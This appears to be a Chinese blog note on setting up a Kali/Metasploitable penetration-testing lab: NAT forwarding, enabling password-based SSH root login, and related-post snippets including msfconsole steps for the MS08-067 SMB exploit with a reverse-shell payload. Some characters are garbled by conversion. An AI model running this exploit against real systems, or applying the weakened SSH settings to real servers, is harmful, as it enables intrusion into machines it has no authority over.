kali滲透測試與教學筆記的實驗環境

2021-10-05 03:49:29 字數 1264 閱讀 1534

主要參考metasploit魔鬼訓練營

配置需要注意的特別是:閘道器伺服器linux metasploitable有兩個網絡卡,乙個連線dmz區,乙個連線內網,配置如下:

開啟/etc/sysctl.conf,開啟其中的資料報**功能:

找到net.ipv4.ip_forward=1語句,把前面的#號去掉,取消注釋。

然後,設定路由**功能:

在root使用者的命令列下:/sbin/iptables -t nat -a postrouting -s 192.168.10.0/24 -o eth0 -j masquerade

該命令只在本次開機執行時有效,所以讓其永久有效,必須寫入啟動檔案:在/etc/rc.local檔案中加入以上命令

注意:linux在啟動的最後階段會執行/etc/rc.local中的命令

修改配置檔案:nano /etc/ssh/sshd_config

將permitrootlogin without-password修改為permitrootlogin yes

將#passwordauthentication no的注釋去掉,並且將no修改為yes //kali中預設是yes

儲存退出

啟動ssh服務:/etc/init.d/ssh start

檢視是否成功:systemctl status ssh

利用securecrt遠端登入kali

設定系統自動啟動ssh服務

方法一:

sysv-rc-conf

sysv-rc-conf --list | grep ssh

sysv-rc-conf ssh on  //系統自動啟動ssh服務

sysv-rc-conf ssh off  // 關閉系統自動啟動ssh服務

方法二:

update-rc.d ssh enable  //系統自動啟動ssh服務

update-rc.d ssh disabled // 關閉系統自動啟動ssh服務

kali滲透測試與教學筆記7

windows服務滲透攻擊實戰 ms08 067安全漏洞 進入msfconsole search ms08 067 use exploit windows smb ms 08 067 netapi show payloads set payload generic shell reverse tcp...

滲透測試筆記 之 配置KALI

dhclient eth0ifconfig eth0 192.168.1.11 24route add default gw 192.168.1.1 netstat na 檢視配置是否生效,destination和genmask都為0.0.0.0的一行是預設閘道器route add net 172....

滲透測試的本質與沉思

專注apt攻擊與防禦 於 目標資產資訊蒐集的廣度,決定滲透過程的複雜程度。目標主機資訊蒐集的深度,決定後滲透許可權持續把控。滲透的本質是資訊蒐集,而資訊蒐集整理為後續的情報跟進提供了強大的保證。持續滲透的本質是線索關聯,而線索關聯為後續的攻擊鏈方提供了強大的方向。後滲透的本質是許可權把控,而許可權把...